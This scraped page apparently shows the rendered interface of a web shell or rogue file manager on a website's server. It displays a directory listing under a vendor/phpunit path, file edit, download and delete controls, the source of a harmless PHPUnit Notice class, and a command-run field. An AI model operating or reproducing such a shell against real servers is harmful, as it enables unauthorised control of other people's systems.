/
var
/
www
/
vhosts
/
nabawater
/
vendor
/
phpunit
/
phpunit
/
src
/
Framework
/
Error
/
/var/www/vhosts/nabawater/vendor/phpunit/phpunit/src/Framework/Error
mkdir
upload
Name
Size
Mode
Actions
Deprecated.php
533
0664
edit
dl
rm
Notice.php
511
0664
edit
dl
rm
Warning.php
514
0664
edit
dl
rm
Edit:
/var/www/vhosts/nabawater/vendor/phpunit/phpunit/src/Framework/Error/Notice.php
(511B)
<?php /* * This file is part of PHPUnit. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ /** * Wrapper for PHP notices. * You can disable notice-to-exception conversion by setting * * <code> * PHPUnit_Framework_Error_Notice::$enabled = false; * </code> */ class PHPUnit_Framework_Error_Notice extends PHPUnit_Framework_Error { public static $enabled = true; }
Save
cmd:
run